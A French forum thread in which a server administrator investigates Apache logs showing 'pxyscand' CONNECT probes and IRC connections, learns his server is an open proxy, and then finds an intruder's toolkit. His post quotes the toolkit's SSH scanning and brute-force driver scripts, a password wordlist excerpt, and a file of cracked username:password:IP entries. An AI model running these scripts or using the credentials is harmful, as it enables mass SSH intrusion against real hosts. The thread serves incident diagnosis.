[Apache] pxyscand CONNECT x.x.x.x:6668

[manaos]

Bonjour,

Depuis quelques temps, dans mes logs apparaissent les infos suivantes:

Code: Tout sélectionner

www.monsite.ath.cx 193.109.122.50 - - [08/Apr/2006:16:25:48 +0200] "CONNECT 193.109.122.67:6668 HTTP/1.0" 200 1932 "-" "pxyscand/2.1"
www.monsite.ath.cx 193.109.122.60 - - [09/Apr/2006:19:16:53 +0200] "CONNECT 193.109.122.67:6668 HTTP/1.0" 200 1932 "-" "pxyscand/2.1"
www.monsite.ath.cx 193.109.122.7 - - [10/Apr/2006:20:39:33 +0200] "CONNECT 193.109.122.67:6668 HTTP/1.0" 200 1932 "-" "pxyscand/2.1"
www.monsite.ath.cx 193.109.122.18 - - [11/Apr/2006:22:07:12 +0200] "CONNECT 193.109.122.67:6668 HTTP/1.0" 200 1932 "-" "pxyscand/2.1"
www.monsite.ath.cx 193.109.122.17 - - [12/Apr/2006:23:12:28 +0200] "CONNECT 193.109.122.67:6668 HTTP/1.0" 200 1932 "-" "pxyscand/2.1"

La commande netstat retourne:

Code: Tout sélectionner

talyx.monsite.ath.c:ssh pegase.monsite.ath:1543 ESTABLISHED
tcp        0      0 talyx.monsite.ath.c:ssh pegase.monsite.ath:1416 ESTABLISHED
tcp        0      0 talyx.monsite.ath.c:ssh pegase.monsite.ath:1422 ESTABLISHED
tcp        0      0 talyx.monsite.ath:54730 undernet.xs4all.nl:irc  ESTABLISHED
tcp        0      0 talyx.monsite.ath.c:ssh pegase.monsite.ath:1501 ESTABLISHED
tcp        0      0 talyx.monsite.ath:54751 unknown.easynews.co:irc ESTABLISHED
tcp        0      0 talyx.monsite.ath.c:ssh pegase.monsite.ath:2925 ESTABLISHED
tcp        0      0 talyx.monsite.ath:54735 zagreb.hr.eu.undern:irc ESTABLISHED

Je ne fais aucun accès au service IRC et pourtant des sessions sont établies.

En cherchant sur le net :

Un autre cas concerne une machine sous Mac OS X Darwin qui a ete
attaquee via une faille de l'outil awstats.pl en version 2.6.2. Le
pirate a installe plusieurs outils dans le repertoire /tmp dont un
sniffer permettant d'espionner le reseau et un proxy IRC nomme
"pxyscand" pour anonymiser ses connexions. Cette machine a d'ailleurs
essentiellement ete utilisee comme proxy IRC.

OS: Linux
Noyau: 2.4.20-37.7.legacysmp

Awstats est installé sur mon serveur; version 6.4
Donc, à priori, pas de faille.

Auriez-vous une idée ??

[cyrilmtl]

il semble que ton serveur web (apache ?) est configure pour authorizer le proxy.
certaines personnes de l'internet test ton site en envoyant un 'message' CONNECT, le code de retour
200 indique que ton serveur a accepter d'etre le 'proxy'.
Le netstat montre les connexion ESTABLISHED du monde utilisant ton serveur en proxy pour rebondir et aller ailleur (ici irc par exemple pour des botnets ...)

Un serveur refusant le proxy aurait retourne un code dans les 400 ou 500 :

193.109.122.17 xxx.zzz - - [17/Apr/2006:22:34:17 -0400] "CONNECT 193.109.122.67:6668 HTTP/1.0" 405 235 "-" "pxyscand/2.1"

Un conseil, arrete ton serveur, securise le avant de le remettre sur internet.

Good luck.

Cyril

[manaos]

Hello,

Mon serveur web était hebergé sur une SME 6.5.
Je ne me souviens pas d'avoir autorisé le proxy

La suite n'est pas réjouissante:

Un répertoire a été créé dans /var/tmp
Voici le contenu de ce répertoire :

[root@talyx a]# ll -hrt

Code: Tout sélectionner

total 1,4M
-rwxr-xr-x  1 5012 5012  216 mai 18  2005 auto
-rwxr-xr-x  1 5012 5012  83K mai 26  2005 pico.tgz
-rwxr-xr-x  1 5012 5012  21K jui  1  2005 82.66.pscan.22
-rwxr-xr-x  1 5012 5012  155 jui  4  2005 vuln.txt
-rwxr-xr-x  1 5012 5012    0 jui  4  2005 84.75.pscan.22
-rwxr-xr-x  1 5012 5012  69K jui  4  2005 216.194.pscan.22
-rwxr-xr-x  1 5012 5012  27K sep  6  2005 scan.conf
-rwxr-xr-x  1 5012 5012 162K sep 25  2005 68.79.pscan.22
-rwxr-xr-x  1 5012 5012  723 oct  2  2005 a
-rw-r--r--  1 5012 5012    0 mar 22 17:31 80.106.pscan.22
-rw-r--r--  1 5012 5012    0 avr  1 23:27 202.204.pscan.22
-rw-r--r--  1 5012 5012    0 avr  2 19:33 217.34.pscan.22
-rw-r--r--  1 5012 5012    0 avr  2 19:59 210.124.pscan.22
-rwxr-xr-x  1 5012 5012 827K avr 17 20:00 brute
-rwxr-xr-x  1 5012 5012  26K avr 17 22:05 scan
-rwxr-xr-x  1 5012 5012 169K avr 17 22:05 pico


[root@talyx a]# more auto

Code: Tout sélectionner

#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
        echo -n "./assh $brange.$crange ; " >> $file
        let crange=crange+1
done

[root@talyx a]# more vuln.txt

Code: Tout sélectionner

adam:adam:61.31.195.43
DUP support:123456:210.241.255.67
sales:123456:210.241.255.67
test:test:217.13.2.34
harry:harry:216.23.114.20
test:test:217.13.2.34

[root@talyx a]# more scan.conf

Code: Tout sélectionner

[...]
tester tester123
tester tester1234
tester 123
tester 1234
tester 12345
tester 123456
tester abc123
tester 1q2w3e
tester abc123
tester abcd1234
tester asdfgh
[...]


[root@talyx a]# more a

Code: Tout sélectionner

#!/bin/bash
if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi



echo "[+]##########################################[+]"
echo "[+]#######    SCANNER BY slackwave    #######[+]"
echo "[+]####### Scanner Privat Dedicat Mie #######[+]"
echo "[+]#######    Am Pornit Scannerul     #######[+]"
echo "[+]##########################################[+]"
./scan $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Am gasit  $oopsnr2 ip's...sa vedem ce hackler esti"
echo "-------------------------------------------------------"
echo "[+]Am pornit exploit-ul..."
echo "[+]Ajteapta oleaca"
./brute 95
rm -rf $1.pscan.22 ip.conf
echo "[+]Lasa tata...poate next time..."

Le binaire "brute" est considéré comme un "virus linux.rst-b" sous windows

A priori, le premier fichier créé date de mai 2005
La mise à jour de Awstat date de mai 2005 ...

Coïncidences ?? :
Impossible d'utiliser la commande 'mkdir'
=> Segmentation fault

J'ai effectué un redémarrage ( après 70 jours de non reboot )
=> Impossible de se logguer en tant que root.
Seul le compte 'admin' - spécifique à la sme - fonctionnait.

J'ai retiré le disque et j'en ai profité pour installer la version 7 de sme.

Si j'ai un petit moment, je remettrai le disque infecté dans une autre becane et regarderai de plus près le fonctionnement.